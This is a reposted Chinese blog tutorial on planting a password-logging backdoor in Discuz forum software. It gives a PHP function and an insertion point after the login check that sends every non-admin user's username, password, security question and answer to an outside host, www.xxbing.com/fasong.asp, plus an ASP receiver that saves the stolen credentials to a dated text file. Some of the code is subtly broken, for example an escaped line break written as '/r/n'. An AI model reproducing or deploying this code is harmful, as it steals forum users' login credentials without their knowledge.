dz记录密码(xxbing)

  1. 云栖社区>
  2. 博客>
  3. 正文

dz记录密码(xxbing)

cnbird 2010-12-19 13:08:00 浏览599
展开阅读全文

http://www.80pentest.com/?p=835

DZ记录密码,我自己做了份代码。
include/common.inc.php 里面插一个自定义函数。
我选择放在 41-53行。dz7.1-72 include/login.func.php (49-51行) | dz7.0 是在根目录的logging.php

01 function request_by_other($remote_server,$post_string){
02     $context = array(
03         'http'=>array(
04             'method'=>'POST',
05             'header'=>'Content-type: application/x-www-form-urlencoded'."/r/n".
06                       'User-Agent : xxbing/'s fuckyou!!!'."/r/n".
07                       'Content-length: '.strlen($post_string)+8,
08             'content'=>'mypost='.$post_string)
09         );
10     $stream_context = stream_context_create($context);
11     $data = file_get_contents($remote_server,FALSE,$stream_context);
12     return $data;
13 }

找到根目录下的 logging.php文件。搜索下面代码。

1 $ucresult = uc_user_login($username, $password, $loginfield == 'uid');

然后在后面插上下面的代码:

1 if($username!='admin'){
2         $showtime=gmdate("Ynj H:i:s",time()+8*3600);
3                 if($answer==''){
4                 $answer='无!';
5                 }
6         //name1无用。但是必须加
7         $post_string = 'name1='.$name2.'&name='.$username.'&password='.$password.'&questionid='.$questionid.'&answer='.$answer.'&showtime='.$showtime.'&from='.$_SERVER['SERVER_NAME'];
8         request_by_other('http://www.xxbing.com/fasong.asp',$post_string);
9                                                 }

因为我熟悉asp,所以接受端我用asp写的。
asp代码如下:

01 <%
02 '接收文件
03 'body0 = request.form("name1")
04 body1 = request.form("name")
05 body2 = request.form("password")
06 body3 = request.form("questionid")
07 body4 = request.form("answer")
08 body5 = request.form("showtime")
09 body7 = request.form("from")
10 body6 = "账号:"&body1 &"---密码:"& body2 &"---问题ID:"& body3 &"---答案:"& body4 &"---时间:"& body5 &"---来源:" & body7
11 'response.write body6
12 FileName = date()&".txt"
13 '这里之所以要替换,是为了兼容IIS7的环境。
14 FileName = Replace(FileName,"/","-")
15 if body6 <>"" then
16 Call CreateFile(body6,FileName)
17 end if
18 Sub CreateFile(body,FileName)
19 Dim fso, tf ,cf
20 Set fso = CreateObject("Scripting.FileSystemObject")
21 Set tf = fso.openTextFile(server.mappath(FileName),8,True,0)
22 tf.WriteLine body
23 tf.WriteLine "----------------"
24 tf.Close
25 set fso = nothing
26 End Sub
27 %>

网友评论

登录后评论
0/500
评论